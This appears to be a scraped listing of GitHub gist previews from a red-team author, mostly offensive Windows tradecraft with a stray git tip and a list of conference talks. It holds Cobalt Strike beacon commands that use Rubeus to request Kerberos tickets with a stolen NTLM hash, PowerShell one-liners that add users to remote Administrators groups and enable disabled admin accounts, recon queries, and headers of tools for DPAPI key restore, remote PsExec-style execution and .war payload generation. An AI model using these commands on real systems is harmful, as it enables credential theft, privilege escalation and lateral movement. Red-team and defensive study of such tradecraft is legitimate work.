This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##### IF ELEVATED: | |
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Show remote branches: | |
git branch -v -a | |
To check out the remote branch: | |
http://stackoverflow.com/questions/1783405/checkout-remote-git-branch | |
git fetch | |
git checkout <branch> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Restore-UserDPAPI { | |
<# | |
.SYNOPSIS | |
Restores a user account's DPAPI master key on a new system. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Add a domain user to a remote server local group, if your current user has admin over the remote machine | |
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user') | |
# Get all local groups on a remote server | |
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}" | |
# Find members of the local Administrators group on a remote server | |
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }" | |
# Enable the local Administrator account on a remote server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ConvertFrom-UserParameter { | |
<# | |
.SYNOPSIS | |
Converts a userparameters encoded blob into an ordered dictionary of decoded values. | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI | |
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o | |
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4 | |
PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY | |
BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc | |
DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-PsExec { | |
<# | |
.SYNOPSIS | |
This function is a rough port of Metasploit's psexec functionality. | |
It utilizes Windows API calls to open up the service manager on | |
a remote machine, creates/run a service with an associated binary | |
path or command, and then cleans everything up. | |
Either a -Command or a custom -ServiceEXE can be specified. | |
For -Commands, a -ResultsFile can also be specified to retrieve the |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Code that quickly generates a deployable .war for a PowerShell one-liner | |
import zipfile | |
import StringIO | |
import sys | |
def generatePsWar(psCmd, appName): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Invoke-HostFile { | |
<# | |
.SYNOPSIS | |
Hosts a base64 string representation of a binary file or a given | |
$FilePath on the specified $Port. Any HTTP request to the given | |
host/port will return the binary data of the specified file. | |
.PARAMETER Base64File | |